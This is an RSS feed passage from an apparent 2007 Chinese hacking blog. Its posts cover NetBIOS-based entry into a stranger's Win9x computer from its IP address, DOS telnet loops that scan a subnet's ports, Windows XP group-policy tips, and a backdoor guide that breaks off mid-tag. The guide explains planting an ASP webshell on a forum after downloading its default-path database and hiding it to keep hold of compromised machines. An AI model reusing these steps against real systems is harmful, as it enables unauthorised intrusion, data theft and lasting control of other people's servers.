﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客网-YIYE黑客技术-随笔分类-黑客</title><link>http://www.cnitblog.com/yiye/category/5400.html</link><description>全部由YIYE原创！</description><language>zh-cn</language><lastBuildDate>Tue, 22 May 2007 11:50:16 GMT</lastBuildDate><pubDate>Tue, 22 May 2007 11:50:16 GMT</pubDate><ttl>60</ttl><item><title>知道对方IP入侵别人的电脑</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:09:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27322.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27322.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27322.html</trackback:ping><description><![CDATA[黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法: <br>1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。
<p>&nbsp;</p>
<p>2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。</p>
<p>3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 </p>
<p>4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 </p>
<p>5.开DOS窗口键入 NBTSTAT -R </p>
<p>6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。</p>
<p>以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。<br></p>
<p>&nbsp;</p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27322.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:09 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>入侵WinXP常用七大招数</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:08:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27320.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27320.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27320.html</trackback:ping><description><![CDATA[<p>本文讲述了<a href="http://www.nohack.cn/" target=_blank>黑客</a>入侵Windows XP操作系统常用的七种方法，如果大家遇到类似那可要注意了&#8230;&#8230; </p>
<p>第一招：屏幕保护 </p>
<p>在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的<a href="http://www.nohack.cn/" target=_blank>安全</a>。 </p>
<p>提示：部分设计不完善的屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>没有屏蔽系统的&#8220;Ctrl+Alt+Del&#8221;的组合键，因此需要设置完成之后测试一下<a href="http://www.nohack.cn/code/" target=_blank>程序</a>是否存在这个重大Bug。 </p>
<p>不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>(扩展名是SCR)，按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的&#8220;在当前位置创建快捷方式&#8221;命令，在桌面上为这些屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>建立一个快捷方式。 </p>
<p>此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。 </p>
<p>第二招：巧妙隐藏硬盘 </p>
<p>在&#8220;按Web页&#8221;查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果&#8220;修改该文件夹的内容可能导致<a href="http://www.nohack.cn/code/" target=_blank>程序</a>运行不正常，要查看该文件夹的内容，请单击显示文件&#8221;，这时单击&#8220;显示文件&#8221;就可以进入该目录了。 </p>
<p>原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件，之前必须在文件夹选项中单击&#8220;查看&#8221;标签，选择&#8220;显示所有文件&#8221;，这样就可以看见这两个文件了)。再按&#8220;F5&#8221;键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。 </p>
<p>接下来我们用&#8220;记事本&#8221;打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。 </p>
<p>如果你不懂HTML语言也没关系，先找到&#8220;显示文件&#8221;将其删除，找到&#8220;修改该文件夹的内可能导致<a href="http://www.nohack.cn/code/" target=_blank>程序</a>运行不正常，要查看该文件夹的内容，请单击显示文件&#8221;，将其改为自己喜欢的文字，例如&#8220;<a href="http://www.nohack.cn/" target=_blank>安全</a>重地，闲杂人等请速离开&#8221;。 </p>
<p>将&#8220;要查看该文件夹的内容，请单击&#8221;改为&#8220;否则，后果自负!&#8221;，接着向下拖动滑块到倒数第9行，找到&#8220;(file：//%TEMPLATEDIR% /wvlogo.gif)&#8221;这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用&#8220;d: /tupian/tupian1.jpg&#8221;替换&#8220;//&#8221;后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。 </p>
<p>当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中&#8220;～&#8221;之间的内容就可以了。 </p>
<p><br>*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0<br>*usingthefile%THISDIRPATH%/folder.htt.<br>&nbsp;</p>
<p>保存并退出，按&#8220;F5&#8221;键刷新一下，是不是很有个性?接下来要作的就是用&#8220;超级兔子&#8221;将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中&#8220;～&#8221;之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更<a href="http://www.nohack.cn/" target=_blank>安全</a>。 </p>
<p>第三招：禁用&#8220;开始&#8221;菜单命令 </p>
<p>在Windows2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的<a href="http://www.nohack.cn/" target=_blank>安全</a>性。运行&#8220;开始&#8594;运行&#8221;命令，在&#8220;运行&#8221;对话框的&#8220;打开&#8221;栏中输入&#8220;gpedit.msc&#8221;，然后单击&#8220;确定&#8221;按钮即可启动WindowsXP组策略编辑器。 </p>
<p>在&#8220;本地计算机策略&#8221;中，逐级展开&#8220;用户配置&#8594;管理模板&#8594;任务栏和开始菜单&#8221;分支，在右侧窗口中提供了&#8220;任务栏&#8221;和&#8220;开始菜单&#8221;的有关策略。 </p>
<p>在禁用&#8220;开始&#8221;菜单命令的时候，在右侧窗口中，提供了删除&#8220;开始&#8221;菜单中的公用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>组、&#8220;我的文档&#8221;图标、&#8220;文档&#8221;菜单、&#8220;网上邻居&#8221;图标等策略。清理&#8220;开始&#8221;菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除&#8220;我的文档&#8221;图标为例，具体操作步骤为： </p>
<p>1)在策略列表窗口中用鼠标双击&#8220;从开始菜单中删除我的文档图标&#8221;选项。 </p>
<p>2)在弹出窗口的&#8220;设置&#8221;标签中，选择&#8220;已启用&#8221;单选按钮，然后单击&#8220;确定&#8221;即可。 </p>
<p>第四招：桌面相关选项的禁用 </p>
<p>WindowsXP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在&#8220;本地计算机策略&#8221;中展开&#8220;用户配置&#8594;管理模板&#8594;桌面&#8221;分支，即可在右侧窗口中显示相应的策略选项。 </p>
<p>1)隐藏桌面的系统图标 </p>
<p>倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。 </p>
<p>若要隐藏桌面上的&#8220;网上邻居&#8221;和&#8220;InternetEXPlorer&#8221;图标，只要在右侧窗口中将&#8220;隐藏桌面上网上邻居图标&#8221;和&#8220;隐藏桌面上的 InternetEXPlorer图标&#8221;两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将&#8220;隐藏和禁用桌面上的所有项目&#8221;启用即可。 </p>
<p>当启用了&#8220;删除桌面上的我的文档图标&#8221;和&#8220;删除桌面上的我的<a href="http://www.nohack.cn/" target=_blank>电脑</a>图标&#8221;两个选项以后，&#8220;我的<a href="http://www.nohack.cn/" target=_blank>电脑</a>&#8221;和&#8220;我的文档&#8221;图标将从你的<a href="http://www.nohack.cn/" target=_blank>电脑</a>桌面上消失了。如果在桌面上你不再喜欢&#8220;回收站&#8221;这个图标，那么也可以把它给删除，具体方法是将&#8220;从桌面删除回收站&#8221;策略项启用。 </p>
<p>2)禁止对桌面的某些更改 </p>
<p>如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将&#8220;退出时不保存设置&#8221;这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。 </p>
<p>第五招：禁止访问&#8220;控制面板&#8221; </p>
<p>如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开&#8220;本地计算机策略&#8594;用户配置&#8594;管理模板&#8594;控制面板&#8221;分支，然后将右侧窗口的&#8220;禁止访问控制面板&#8221;策略启用即可。 </p>
<p>此项设置可以防止控制面板<a href="http://www.nohack.cn/code/" target=_blank>程序</a>文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从&#8220;开始&#8221;菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。 </p>
<p>提示：如果你想从上下文菜单的属性项目中选择一个&#8220;控制面板&#8221;项目，会出现一个消息，说明该设置防止这个操作。 </p>
<p>第六招：设置用户权限 </p>
<p>当多人共用一台计算机时，在WindowsXP中设置用户权限，可以按照以下步骤进行： </p>
<p>1)运行组策略编辑器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>。 </p>
<p>2)在编辑器窗口的左侧窗口中逐级展开&#8220;计算机配置&#8594;Windows设置&#8594;<a href="http://www.nohack.cn/" target=_blank>安全</a>设置&#8594;本地策略&#8594;用户权限指派&#8221;分支。 </p>
<p>3)双击需要改变的用户权限，单击&#8220;添加用户或组&#8221;按钮，然后双击想指派给权限的用户账号，最后单击&#8220;确定&#8221;按钮退出。 </p>
<p>第七招：文件夹设置审核 </p>
<p>WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的<a href="http://www.nohack.cn/" target=_blank>安全</a>。为文件和文件夹设置审核的步骤如下： </p>
<p>1)在组策略窗口中，逐级展开右侧窗口中的&#8220;计算机配置&#8594;Windows设置&#8594;<a href="http://www.nohack.cn/" target=_blank>安全</a>设置&#8594;本地策略&#8221;分支，然后在该分支下选择&#8220;审核策略&#8221;选项。 </p>
<p>2)在右侧窗口中用鼠标双击&#8220;审核对象访问&#8221;选项。 </p>
<p>3)用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的&#8220;属性&#8221;命令，接着在弹出的窗口中选择&#8220;<a href="http://www.nohack.cn/" target=_blank>安全</a>&#8221;标签。 </p>
<p>4)单击&#8220;高级&#8221;按钮，然后选择&#8220;审核&#8221;标签。 </p>
<p>5)根据具体情况选择你的操作： </p>
<p>倘若对一个新组或用户设置审核，可以单击&#8220;添加&#8221;按钮，并且在&#8220;名称&#8221;框中键入新用户名，然后单击&#8220;确定&#8221;按钮打开&#8220;审核项目&#8221;对话框。 </p>
<p>要查看或更改原有的组或用户审核，可以选择用户名，然后单击&#8220;查看/编辑&#8221;按钮。 </p>
<p>要删除原有的组或用户审核，可以选择用户名，然后单击&#8220;删除&#8221;按钮即可。 </p>
<p>6)如有必要的话，在&#8220;审核项目&#8221;对话框中的&#8220;应用到&#8221;列表中选取你希望审核的地方。 </p>
<p>7)如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择&#8220;仅对此容器内的对象和/或容器应用这些审核项&#8221;复选框。 </p>
<p>注意：必须是管理员组成员或在组策略中被授权有&#8220;管理审核和<a href="http://www.nohack.cn/" target=_blank>安全</a>日志&#8221;权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前，你必须启用组策略中&#8220;审核策略&#8221;的&#8220;审核对象访问&#8221;。否则，当你设置完文件、文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核。 </p>
<p><br></p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27320.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:08 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>dos命令扫描网段的端口</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:08:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27321.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27321.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27321.html</trackback:ping><description><![CDATA[<font id=Zoom>
<p>不需要任何工具,dos命令扫描一个网段的全部端口! <br>　　在win2000下开一个dos窗口，然后执行 <br>for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389 <br>这样192.168.0.x这个段的所有开放3389端口得主机都会暴露 <br>这条命令执行后 <br>会在任务栏开254个小窗口 <br>然后telnet链接失败的窗口会在大约5秒后自动退出 <br>剩下的窗口就是相对应开放端口的主机了 <br>看一下小窗口的标题可以得知主机的ip地址 <br>如果你觉得机器性能很好的话 可以把/low参数去了 </p>
<p>现在扫描一台主机的多个端口，如下 <br>for /l %a in (1,1,65535) do start /low /min telnet 192.168.0.1%a <br>这样就扫描192.168.0.1的1到65535端口 </p>
<p>现在扫描一个网段的所有端口 <br>for /l %a in (1,1,254) do for /l %b in (1,1,65535) do start /low/min telnet 192.168.0.%a %b <br>这样就会扫描192.168.0.x段的全部1到65535段口 </p>
<p>以上命令只能在win2000下使用，因为/l累加参数是win2000对for的扩展 ,当然winXP和win.NET都可以用，winME我没有试过，因为没有winME的机器</p>
</font>
<img src ="http://www.cnitblog.com/yiye/aggbug/27321.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:08 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>让肉鸡难逃五指山---精品后门程序及思路分板</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:07:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27319.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27319.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27319.html</trackback:ping><description><![CDATA[<font id=Zoom><font id=font_word style="FONT-SIZE: 14px; FONT-FAMILY: 宋体,Verdana,Arial,Helvetica,sans-serif">什么是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a><br>后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>又称特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>，其用途在于潜伏在<a href="http://www.nohack.cn/" target=_blank>电脑</a>中，从事搜集信息或便于<a href="http://www.nohack.cn/" target=_blank>黑客</a>进入的动作。后<a href="http://www.nohack.cn/code/" target=_blank>程序</a>和<a href="http://www.nohack.cn/" target=_blank>电脑</a><a href="http://www.nohack.cn/" target=_blank>病毒</a>最大的差别，在于后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>不一定有自我复制的动作，也就是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>不一定会&#8220;感染&#8221;其他<a href="http://www.nohack.cn/" target=_blank>电脑</a>。<br>后门是一种登录系统的方法，它不仅绕过系统已有的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置，而且还能挫败系统上各种增强的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置。<br>后门是一种登录系统的方法，它不仅绕过系统已有的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置，而且还能挫败系统上各种增强的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置。<br>后门包括从简单到奇特，有很多的类型。简单的后门可能只是建立一个新的账号，或者接管一个很少使用的账号；复杂的后门（包括<a href="http://www.nohack.cn/" target=_blank>木马</a>）可能会绕过系统的<a href="http://www.nohack.cn/" target=_blank>安全</a>认证而对系统有<a href="http://www.nohack.cn/" target=_blank>安全</a>存取权。例如一个login<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，你当输入特定的密码时，你就能以管理员的权限来存取系统。<br>后门能相互关联，而且这个<a href="http://www.nohack.cn/" target=_blank>技术</a>被许多<a href="http://www.nohack.cn/" target=_blank>黑客</a>所使用。例如，<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能使用密码破解一个或多个账号密码，<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能会建立一个或多个账号。一个<a href="http://www.nohack.cn/" target=_blank>黑客</a>可以存取这个系统，<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能使用一些<a href="http://www.nohack.cn/" target=_blank>技术</a>或利用系统的某个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>来提升权限。<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能使用一些<a href="http://www.nohack.cn/" target=_blank>技术</a>或利用系统的某个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>庭湖来提升权限。<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能会对系统的配置文件进行小部分的修改，以降低系统的防卫性能。也可能会安装一个<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>，使系统打开一个<a href="http://www.nohack.cn/" target=_blank>安全</a><a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，以利于<a href="http://www.nohack.cn/" target=_blank>黑客</a>完全掌握系统。<br>以上是在<a href="http://www.nohack.cn/" target=_blank>网络</a>上常见的对&#8220;后门&#8221;的解释，其实我们可以用很简单的一句话来概括它：后门就是留在计算机系统中，供某位特殊使用都通过某种特殊方式控制计算机系统的途径！——很显然，掌握好后门<a href="http://www.nohack.cn/" target=_blank>技术</a>是每个<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者不可或缺的一项基本技能！它能让你牢牢抓住肉鸡，让它永远飞不出你的五指山！<br>下文将以笔者从事<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>多年的工作经验为基础，给广大的<a href="http://www.nohack.cn/" target=_blank>网络</a>初级<a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者讲解一些<a href="http://www.nohack.cn/" target=_blank>网络</a>上常用的后门的种类和使用方法以及技巧，希望大家能在最短的时间内学习到最好的<a href="http://www.nohack.cn/" target=_blank>技术</a>，提升自己的<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a><a href="http://www.nohack.cn/" target=_blank>技术</a>水平！<br><br>后门的分类<br>后门可以按照很多方式来分类，标准不同自然分类就不同，为了便于大家理解，我们从<a href="http://www.nohack.cn/" target=_blank>技术</a>方面来考虑后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的分类方法：<br>1.网页后门<br>此类后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>一般都是服务器上正常的web服务来构造自己的连接方式，比如现在非常流行的<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>、cgi<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门等。<br>2。线程插入后门<br>利用系统自身的某个服务或者线程，将后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>插入到其中，具体原理原来《<a href="http://www.nohack.cn/" target=_blank>黑客</a>防线》曾具体讲解过，感兴趣的朋友可以查阅。这也是现在最流行的一个后门<a href="http://www.nohack.cn/" target=_blank>技术</a>。<br>3扩展后门<br>所谓的&#8220;扩展&#8221;，是指在功能上有大的提升，比普通的单一功能的后门有很强的使用性，这种后门本身就相当于一个小的<a href="http://www.nohack.cn/" target=_blank>安全</a>工具包，能实现非常多的常驻见<a href="http://www.nohack.cn/" target=_blank>安全</a>功能，适合新手使用————但是，功能越强，个人觉得反而脱郭后门&#8220;隐蔽&#8221;的初衷，具体看法就看各位使用都的喜好了。<br>4.c/s后门<br>和传统的<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>类似的控制方法，采用&#8220;客记端/服务端&#8221;的控制方式，通过某种特定的访问方式来启动后门进而控制服务器。<br><br>5.rootkit<br>这个需要单独说明，其实把它单独列一个类在这里是不太恰当的，但是，rootkit的出现大大改变了后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的思维角度和使用理念，可以说一个好的rootkit就是一个完全的系统杀手！后文我们讲涉及到这方面，想念一定不会让大家失望！<br>上面是按照<a href="http://www.nohack.cn/" target=_blank>技术</a>做的分类，除了这些方面，正向连接后门、反向连接后门等分类也是很常见的，其实如何分类是编程者考虑的事，广大的使用者就不用考虑那么多了，我们看重的，只是功能！<br>入侵法定————精品后门<br><br>上面的&#8220;废话&#8221;想念大家都看累了吧？好，下面我们来看看现在<a href="http://www.nohack.cn/" target=_blank>网络</a>中浒的后门究竟长什么模样想学习<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>并想提高的朋友看清楚了哦，这可是让你的肉鸡逃不出你的五指山的大好途径！ <br><br>1.网页后门<br>近段时间<a href="http://www.nohack.cn/" target=_blank>网络</a>上针对系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>的<a href="http://www.nohack.cn/" target=_blank>攻击</a>事件渐渐少了，因为大家在认识到<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>的重要性之后，最简单却又最有效的防护办法：升级，都被大家所认同，所以系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>在以后的岁月中存活的周期会越来越短，而从最近的趋势来看，肢本<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>已经渐渐取代了系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>的地位，非常多的人开始研究起却本<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>来，sql注入也开始成为各大<a href="http://www.nohack.cn/" target=_blank>安全</a>站点首要关注热点，而说到<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>、网页后门当然就是不得不说的重头戏了，现在国内入侵的主流趋势是先利用某种<a href="http://www.nohack.cn/code/" target=_blank>脚本</a><a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>上传<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门，然后浏览服务器内安装和<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，找到提升权限的突破口，进而拿到服务器的系统权限。<br>现在<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>、CGI、PHP这三个<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>大类在<a href="http://www.nohack.cn/" target=_blank>网络</a>上的普遍运用带来了<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门在这三方面的发展，下面我们一一道来：<br>海阳顶端ASP<a href="http://www.nohack.cn/" target=_blank>木马</a><br>这是ASP<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>方面流传非常广的一个<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门了，在经过几次大的改革后，推出了&#8220;海阳顶端ASP<a href="http://www.nohack.cn/" target=_blank>木马</a>XP版&#8221;、&#8220;海阳顶端ASP<a href="http://www.nohack.cn/" target=_blank>木马</a>红粉佳人版&#8221;等功能强大、使用方便的后门，想念经常接解脚步本<a href="http://www.nohack.cn/" target=_blank>安全</a>的朋友对这些都不会陌生。<br>类型：网页<a href="http://www.nohack.cn/" target=_blank>木马</a><br>使用范围：支持ASP、WEB访问<br>隐蔽<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>使用难度：★☆☆☆☆<br>危害<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★☆☆<br>查杀难度：★★★☆☆<br>现在的服务器系统配置都相对<a href="http://www.nohack.cn/" target=_blank>安全</a>，公开的系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>存在的机会很少，于是<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>方面的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>就开始火起来。首先我们通过某种途径获得一个服务器的页面权限（比如利用<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定<a href="http://www.nohack.cn/code/" target=_blank>程序</a>），然后我们可以通过简单的上传ASP<a href="http://www.nohack.cn/code/" target=_blank>程序</a>或者是直接复制海阳项端的代码，然后通过WEB访问这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，就能很方便地查阅服务器上的资料了，下面举个简单的便子（由于只是简单的介绍，下文便子不会太难或者太普遍，希望大家理解）。<br>运用举便<br>leadbbs2.77曾经风靡<a href="http://www.nohack.cn/" target=_blank>网络</a>，它是个很典型的ASP<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜级别的<a href="http://www.nohack.cn/" target=_blank>网络</a>管理员总是喜欢默认安装，然后启用<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>，我们只需要很简单地在IE中输入：WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>的<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>了，而且没有MD5加密哦！，我们直接找到管理员的账户和密码，然后登录<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>，到管理界面将<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>的&#8220;联系我们&#8221;、&#8220;帮助&#8221;等ASP文件替换成我们的海阳项端代码，然后执行GUEST权限的CMD命令，方便的上传/下载将定<a href="http://www.nohack.cn/code/" target=_blank>程序</a>、远程执行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>等，这样一个隐藏的后门就建好了！取得服务器的SYSTEM权限就看大家自己的办法了。<br>一般来讲，海洋的功能是非常强大的，而且不容易被查杀（一个朋友采取的方式是：先利用某个<a href="http://www.nohack.cn/code/" target=_blank>脚本</a><a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>上传网页后门，再通过海洋上传另一个后门到隐蔽的路径，然后通过最后上传的后门来删除第一次上传的海洋，这样后门的存放路径就可以放得非常深了，普通管理员是很难发现的），如果管理员觉得自己可能中了这里边样的后门，可以利用<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>备份来恢复自己的页面系统，再配合系统日志、<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>日志等<a href="http://www.nohack.cn/code/" target=_blank>程序</a>检查系统，发现可疑ASP文件打开看看海洋是很好识别的，再删除就可以了。<br><a href="http://www.nohack.cn/code/" 